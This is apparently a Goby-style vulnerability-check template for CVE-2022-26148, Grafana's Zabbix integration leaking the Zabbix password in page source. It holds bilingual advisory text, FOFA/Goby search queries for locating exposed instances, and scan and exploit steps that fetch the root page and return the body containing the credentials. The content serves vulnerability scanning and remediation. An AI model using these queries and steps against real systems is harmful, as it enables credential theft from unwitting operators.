{
"Name": "Grafana Zabbix Information Leakage (CVE-2022-26148)",
"Description": "<p>Grafana is a set of open-source monitoring tools provided by Grafana Labs that offers a visual monitoring interface. It is mainly used to monitor and analyze Graphite, InfluxDB, Prometheus, etc.<br></p><p>Grafana 7.3.4 and earlier versions contain a security vulnerability that originates from their integration with Zabbix: the Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
"Product": "Grafana",
"Homepage": "https://grafana.com",
"DisclosureDate": "2022-03-30",
"Author": "abszse",
"FofaQuery": "title=\"Grafana\" && body=\"alexanderzobnin-zabbix-datasource\"",
"GobyQuery": "title=\"Grafana\" && body=\"alexanderzobnin-zabbix-datasource\"",
"Level": "3",
"Impact": "<p>Grafana 7.3.4 and earlier versions contain a security vulnerability that originates from their integration with Zabbix: the Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
"Recommendation": "<p>Apply the official update promptly: <a href=\"https://grafana.com/grafana/download\">https://grafana.com/grafana/download</a><br></p>",
"References": [
"https://2k8.org/post-319.html"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "zabbix",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "alexanderzobnin-zabbix-datasource",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "password\":\"",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "alexanderzobnin-zabbix-datasource",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "password",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [
"Information Disclosure"
],
"VulType": [
"Information Disclosure"
],
"CVEIDs": [
"CVE-2022-26148"
],
"CNNVD": [
"CNNVD-202203-1938"
],
"CNVD": [
""
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "Grafana 集成 Zabbix 存在信息泄露漏洞(CVE-2022-26148)",
"Product": "Grafana",
"Description": "<p>Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。<br></p><p>Grafana 7.3.4版本及之前版本存在安全漏洞,该漏洞源于Grafana 7.3.4版本及之前版本与 Zabbix 集成时,Zabbix 密码可以在 api_jsonrpc.php HTML 源代码中找到。当用户登录或注册时,可以右键查看源码,使用Ctrl-F在api_jsonrpc.php中搜索password,可以发现Zabbix的账号密码和URL地址。<br></p>",
"Recommendation": "<p>及时关注官网更新:<a href=\"https://grafana.com/grafana/download\">https://grafana.com/grafana/download</a><br></p>",
"Impact": "<p>Grafana 7.3.4版本及之前版本存在安全漏洞,该漏洞源于Grafana 7.3.4版本及之前版本与 Zabbix 集成时,Zabbix 密码可以在 api_jsonrpc.php HTML 源代码中找到。当用户登录或注册时,可以右键查看源码,使用Ctrl-F在api_jsonrpc.php中搜索password,可以发现Zabbix的账号密码和URL地址。<br></p>",
"VulType": [
"信息泄漏"
],
"Tags": [
"信息泄漏"
]
},
"EN": {
"Name": "Grafana Zabbix Information Leakage (CVE-2022-26148)",
"Product": "Grafana",
"Description": "<p>Grafana is a set of open-source monitoring tools provided by Grafana Labs that offers a visual monitoring interface. It is mainly used to monitor and analyze Graphite, InfluxDB, Prometheus, etc.<br></p><p>Grafana 7.3.4 and earlier versions contain a security vulnerability that originates from their integration with Zabbix: the Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
"Recommendation": "<p>Apply the official update promptly: <a href=\"https://grafana.com/grafana/download\">https://grafana.com/grafana/download</a><br></p>",
"Impact": "<p>Grafana 7.3.4 and earlier versions contain a security vulnerability that originates from their integration with Zabbix: the Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
"VulType": [
"Information Disclosure"
],
"Tags": [
"Information Disclosure"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
} |